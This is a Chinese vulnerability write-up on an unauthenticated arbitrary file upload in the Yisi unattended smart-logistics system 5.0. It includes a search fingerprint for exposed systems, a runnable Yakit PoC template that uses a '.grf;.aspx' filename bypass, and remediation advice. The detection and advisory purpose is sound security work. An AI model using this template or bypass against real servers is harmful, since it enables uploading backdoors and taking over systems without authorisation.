【漏洞复现】易思智能物流无人值守系统文件上传

本文由掌控安全学院 - 江月 投稿

【产品介绍】

易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业，帮助企业实现无人值守的智能物流运营，提高效率、降低成本，为现代物流行业带来新的发展机遇。

【漏洞描述】

易思无人值守智能物流系统/Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞，未经授权的攻击者可通过此漏洞上传恶意后门文件，从而获取服务器权限。

【影响范围】

易思智能物流无人值守系统5.0

【指纹】

web.body=”智能物流无人值守系统”

【Poc检测】

【验证】

【Yakit Poc自动化验证】

id: Yisi-upload

info:
  name: Yisi-upload
  author: hack
  severity: info
  description: description
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |
        POST /Sys_ReportFile/ImportReport?encode=hack HTTP/1.1
        Host: {{Hostname}}
        X-File-Name: test.grf
        User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxzUhGld6cusN3Alk
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Length: 207

        ------WebKitFormBoundaryxzUhGld6cusN3Alk
        Content-Disposition: form-data; name="file"; .filename="test.grf;.aspx"
        Content-Type: application/octet-stream

        test
        ------WebKitFormBoundaryxzUhGld6cusN3Alk--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Custom
      - type: status
        status:
          - 200

【修复建议】

对上传文件的类型、大小、文件名等进行验证，确保只允许上传合法的文件类型，并限制文件大小和文件名的长度。可以使用白名单或黑名单的方式进行验证。

及时关注和应用厂商发布的安全补丁和更新，修复已知的文件上传漏洞。

没看够？欢迎关注